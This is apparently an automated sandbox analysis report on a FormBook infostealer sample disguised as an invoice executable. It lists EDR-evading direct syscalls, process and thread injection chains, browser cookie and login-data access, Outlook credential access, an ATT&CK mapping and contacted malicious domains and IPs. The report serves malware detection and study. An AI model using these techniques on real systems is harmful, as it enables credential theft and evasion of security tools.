            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC mov eax, dword ptr fs:[00000030h]2_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF6C7 mov eax, dword ptr fs:[00000030h]2_2_03CEF6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C616CF mov eax, dword ptr fs:[00000030h]2_2_03C616CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC36EE mov eax, dword ptr fs:[00000030h]2_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC36EE mov eax, dword ptr fs:[00000030h]2_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC36EE mov eax, dword ptr fs:[00000030h]2_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC36EE mov eax, dword ptr fs:[00000030h]2_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC36EE mov eax, dword ptr fs:[00000030h]2_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC36EE mov eax, dword ptr fs:[00000030h]2_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5D6E0 mov eax, dword ptr fs:[00000030h]2_2_03C5D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5D6E0 mov eax, dword ptr fs:[00000030h]2_2_03C5D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C636EF mov eax, dword ptr fs:[00000030h]2_2_03C636EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CED6F0 mov eax, dword ptr fs:[00000030h]2_2_03CED6F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB368C mov eax, dword ptr fs:[00000030h]2_2_03CB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB368C mov eax, dword ptr fs:[00000030h]2_2_03CB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB368C mov eax, dword ptr fs:[00000030h]2_2_03CB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB368C mov eax, dword ptr fs:[00000030h]2_2_03CB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03C6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D6AA mov eax, dword ptr fs:[00000030h]2_2_03C2D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D6AA mov eax, dword ptr fs:[00000030h]2_2_03C2D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C276B2 mov eax, dword ptr fs:[00000030h]2_2_03C276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C276B2 mov eax, dword ptr fs:[00000030h]2_2_03C276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C276B2 mov eax, dword ptr fs:[00000030h]2_2_03C276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C666B0 mov eax, dword ptr fs:[00000030h]2_2_03C666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4C640 mov eax, dword ptr fs:[00000030h]2_2_03C4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C69660 mov eax, dword ptr fs:[00000030h]2_2_03C69660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C69660 mov eax, dword ptr fs:[00000030h]2_2_03C69660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C62674 mov eax, dword ptr fs:[00000030h]2_2_03C62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C61607 mov eax, dword ptr fs:[00000030h]2_2_03C61607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE609 mov eax, dword ptr fs:[00000030h]2_2_03CAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6F603 mov eax, dword ptr fs:[00000030h]2_2_03C6F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\INV20240828.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\chkntfs.exeThread register set: target process: 1576Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\chkntfs.exeThread APC queued: target process: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\INV20240828.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 300D008Jump to behavior
            Source: C:\Users\user\Desktop\INV20240828.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INV20240828.exe"Jump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: INV20240828.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: umoPQplhJOFey.exe, 00000004.00000002.4505319106.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000004.00000000.2321475919.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505554687.0000000000DB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: umoPQplhJOFey.exe, 00000004.00000002.4505319106.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000004.00000000.2321475919.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505554687.0000000000DB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: umoPQplhJOFey.exe, 00000004.00000002.4505319106.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000004.00000000.2321475919.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505554687.0000000000DB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: umoPQplhJOFey.exe, 00000004.00000002.4505319106.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000004.00000000.2321475919.00000000017A1000.00000002.00000001.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505554687.0000000000DB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4504655296.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2403022417.00000000070F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4505559577.0000000002DA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4504355624.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4507474267.0000000004B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4505524370.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2396873201.0000000003FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4504655296.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2403022417.00000000070F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4505559577.0000000002DA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4504355624.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4507474267.0000000004B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4505524370.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2396873201.0000000003FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501645 Sample: INV20240828.exe Startdate: 30/08/2024 Architecture: WINDOWS Score: 100 28 www.golbasi-nakliyat.xyz 2->28 30 www.asian-massage-us.xyz 2->30 32 18 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 INV20240828.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 umoPQplhJOFey.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 chkntfs.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 umoPQplhJOFey.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.dfbio.net 218.247.68.184, 49747, 49748, 49749 WEST263GO-HKWest263InternationalLimitedHK China 22->34 36 www.fineg.online 162.0.239.141, 49727, 49728, 49729 NAMECHEAP-NETUS Canada 22->36 38 8 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            INV20240828.exe28%VirustotalBrowse
            INV20240828.exe63%ReversingLabsWin32.Trojan.Leonem
            INV20240828.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            aflaksokna.com0%VirustotalBrowse
            d55dg.top0%VirustotalBrowse
            www.healthsolutions.top1%VirustotalBrowse
            omexai.info0%VirustotalBrowse
            natroredirect.natrocdn.com0%VirustotalBrowse
            www.d55dg.top1%VirustotalBrowse
            www.omexai.info0%VirustotalBrowse
            www.arlon-commerce.com0%VirustotalBrowse
            www.aflaksokna.com0%VirustotalBrowse
            www.myim.cloud0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
